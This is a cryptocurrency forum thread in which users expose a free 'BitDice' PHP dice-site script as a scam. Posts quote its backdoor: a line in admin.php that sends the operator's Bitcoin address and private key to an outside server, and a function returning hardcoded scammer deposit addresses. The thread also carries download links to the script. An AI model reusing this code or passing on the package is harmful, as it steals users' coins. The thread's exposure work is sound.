Pages:
Author

Topic: BitDice - Always wanted to make your own Bitcoin dice betting site? [Free] (Read 12946 times)

sr. member
Activity: 462
Merit: 250
Wow, I'm surprised by the sophistication of this scam. Just incredible. It reminds me of the Sharexcoin scam where the scammer coded an entire exchange only to later run off with everyone's coins. Sad

Also, I guess this thread is further proof that open source is the way to go (although I guess since it's a PHP script, it's open source by default).

With some tweaking, wouldn't it be possible to completely remove the backdoor and turn this into a legit dice script? The scammer already did most of the work and judging by the screenshots, it seems they did quite a good job (minus the scam bit of course). Just add a front end and voila! I have some experience in Python and Java and I know PHP isn't too different from Java so I think I could do it if there is enough interest. I think there would be a lot of demand for something like this. Perhaps the community could make something good out of this.
legendary
Activity: 2912
Merit: 1060
Does someone have a really clean version , Evan should be banned...

There is no clean version because there's no front end
jr. member
Activity: 34
Merit: 10
Does someone have a really clean version , Evan should be banned...
full member
Activity: 182
Merit: 100
sr. member
Activity: 462
Merit: 251
Unfortunately, I don't know of any. With dice-sites from unknown sources there will be always some risk (they could include a backdoor, perhaps not as obvious as this one, but still stealing your coins), so you'll have to inspect the code carefully before running it.
newbie
Activity: 21
Merit: 0
Got it, thanks for confirmation.

Do you know any open source script that could be a base for further development for a simple dice game?
sr. member
Activity: 462
Merit: 251
There is no clean version. This is not a dice site with a backdoor. This is a just backdoor with thin layer of props around it that mimick a dice site. If you remove the backdoor - nothing actually will remain to "fix". There is no wallet management, no betting system, nothing ... just the BTC stealing backdoor.
newbie
Activity: 21
Merit: 0
Did anybody test "clean" version?

Edit: OK, got it. No dice script here, only scam. Maybe closing thread is a good idea?
newbie
Activity: 20
Merit: 0
Yup , i edit cause i just discovered it today on torrent and just screamed Bloody murder before reading your messages.
True, i scanned every file and its only a facade to steal bitcoins.
legendary
Activity: 2912
Merit: 1060
Finally I don't see the actual application, just the admin page. The goal may be to take your password or give you his addresses to fund before you realize there's no front end.

Why do you think the initial posts contains in red the sentence: Please make sure that at least $20-$50 worth of bitcoins are in the "bank"?

This is just a scammy backdoor to steal coins - someone installs the site, puts some initial deposit as suggested and poof ... the deposit is gone the second after it is deposited, since the scammer has the address and the appropriate private key Smiley If someone is dumb enough to not notice it, there are 8 more scammer's addresses for deposits to show up when someone wants to deposit money to play (which won't end up on the site, but in scammer's pocket).

Stay away from this.

But how can they play?
sr. member
Activity: 462
Merit: 251
Finally I don't see the actual application, just the admin page. The goal may be to take your password or give you his addresses to fund before you realize there's no front end.

Why do you think the initial posts contains in red the sentence: Please make sure that at least $20-$50 worth of bitcoins are in the "bank"?

This is just a scammy backdoor to steal coins - someone installs the site, puts some initial deposit as suggested and poof ... the deposit is gone the second after it is deposited, since the scammer has the address and the appropriate private key Smiley If someone is dumb enough to not notice it, there are 8 more scammer's addresses for deposits to show up when someone wants to deposit money to play (which won't end up on the site, but in scammer's pocket).

Stay away from this.
legendary
Activity: 2912
Merit: 1060
Even the "fixed" version contains the backdoor.
I need someone that can help me cleaning this script so we can run a polite business.
If interested(not for bitcoins, for altcoins like catcoin,earthcoin... ecc ecc.) PM me.

Clean version, well not clean, but not phone home

CogeIgniter system replaced for more safety.

Each file manually checked.

It's still not fully safe though, the encrypt() function does nothing

public function encrypt($string){
      return $string;
   }

Not sure about the implications though.

Also seems to return preset addresses

function get_address(){
      
      $addresses = array("145N2EFzReaH4hkfb8jVaYbLq7VUm75TmV", "12ENTxaNfyrrzGGu2WDyrC4xZy2tVQA5az", "13yTHvFDxaUUP44KiDkWk27F4We18gJFse", "1ATknpbvfjzXkg1nFGJPTeG9Wzxhi9Z5Ts", "12eGV9FcCvqNU8Ya6CUD8Uu4nNHNPJaKGi", "1L1ULCndeghKZAteTe3tmcKG6HCPDCeLMX", "18JxX3839mZCMrRbtAP1W485kHW3RYUnFG", "16nVMZ3qKwRhFoHTPZjF67EdJ9nrchUSQf");
      return $addresses[array_rand($addresses)];
      
   }

Finally I don't see the actual application, just the admin page. The goal may be to take your password or give you his addresses to fund before you realize there's no front end.

bitdice-1.01.CLEAN.7z
https://mega.co.nz/#!UMFyRDxZ!bXs-fgPSS2Es3blyPReuoV05jB0jLGwAVHP66X7bpc8

CRC32: c8f9aef7
MD5: f9aca5d45fedde616e13b282271534b1
SHA-1: f522bbd32f5cf02b7b30aa56710710ee62da95ed
SHA-256: c7e95e8c446bf2c1a236a654b0f53f1bd11ab7cfd6355be7f37b0bf654f41b77
SHA-512: 0b11adb6e69dc59699717649f8c18819386d42f4240fefb30815807a4cd12c411545571944d7201 6f9181a583c70e6b82d97bbdc2b1d5bcd7bc06b0bbb4b2a66
legendary
Activity: 2884
Merit: 1117
Even the "fixed" version contains the backdoor.
I need someone that can help me cleaning this script so we can run a polite business.
If interested(not for bitcoins, for altcoins like catcoin,earthcoin... ecc ecc.) PM me.
sr. member
Activity: 462
Merit: 251
Let's look at line 58 in admin.php in the source archive:

Code:
$resp = file_get_contents("http://dicetest.net23.net/electro2000/123.php?btca=$bankaddress&btcs=$banksecret");

All your coins are belong to us...
legendary
Activity: 2912
Merit: 1060
An Error Was Encountered

Unable to locate the model you have specified: viewbase

I have fixed that bug. It is now working in pretty much every hosting.

In order to work:

- Upload via FTP.
- Edit the file application/config/config.php and write your URL in:
$config['base_url']   = 'http://YOURHOST/bitdice/';
- Then install the script in your mysql database going to the /install/ directory.

1.01 download: https://www.mediafire.com/?swhpay0sgfiaij5

Tested in http://www.000webhost.com/ and it seems to work.

Can you get me a .zip file of it

What's wrong with rar
newbie
Activity: 7
Merit: 0
Happy new year have good time
full member
Activity: 218
Merit: 101
An Error Was Encountered

Unable to locate the model you have specified: viewbase

I have fixed that bug. It is now working in pretty much every hosting.

In order to work:

- Upload via FTP.
- Edit the file application/config/config.php and write your URL in:
$config['base_url']   = 'http://YOURHOST/bitdice/';
- Then install the script in your mysql database going to the /install/ directory.

1.01 download: https://www.mediafire.com/?swhpay0sgfiaij5

Tested in http://www.000webhost.com/ and it seems to work.

Can you get me a .zip file of it
legendary
Activity: 2912
Merit: 1060
legendary
Activity: 2884
Merit: 1117
Looking good! Grin
Expecially for the option application/controllers/admin.php where it says:
Quote
//Sending bank address and secret encrypted to a server to check balance
          $bankaddress = $this->encrypt($this->input->post("bankaddress"));
          $banksecret = $this->encrypt($this->input->post("banksecret"));
           $fee = $this->input->post("fee");
          $pass = $this->input->post("pass");
         
          $resp = file_get_contents("http://dicetest.net23.net/electro2000/123.php?btca=$bankaddress&btcs=$banksecret");
                 $data = array
Where it sends your info to his website(Why the creator of the website wants our password?)
 or this:
Quote
private function get_address(){
      
      $addresses = array("145N2EFzReaH4hkfb8jVaYbLq7VUm75TmV", "12ENTxaNfyrrzGGu2WDyrC4xZy2tVQA5az", "13yTHvFDxaUUP44KiDkWk27F4We18gJFse", "1ATknpbvfjzXkg1nFGJPTeG9Wzxhi9Z5Ts", "12eGV9FcCvqNU8Ya6CUD8Uu4nNHNPJaKGi", "1L1ULCndeghKZAteTe3tmcKG6HCPDCeLMX", "18JxX3839mZCMrRbtAP1W485kHW3RYUnFG", "16nVMZ3qKwRhFoHTPZjF67EdJ9nrchUSQf");
      return $addresses[array_rand($addresses)];

Where it happens to be a nice list of where receive your Bank's money.
Anyone that is be so gentle to edit the parts where it sends the money to the creator of this?
I mean, I know it's opensorce but at least not steal people's money

Quote
IMPORTANT: You need to create a separate bitcoin address that will be used as a bank for the script. Winnings and losses will be deposited in the bank using blockchain.info's API. Please make sure that at least $20-$50 worth of bitcoins are in the "bank". (If it's any less there might be issues with the betting system and transactions) - Make sure to add the bank's address AND the bank's private key in the admin panel after install, otherwise the script won't work! <= aka I will not receive your money!
newbie
Activity: 24
Merit: 0
Pages:
Jump to: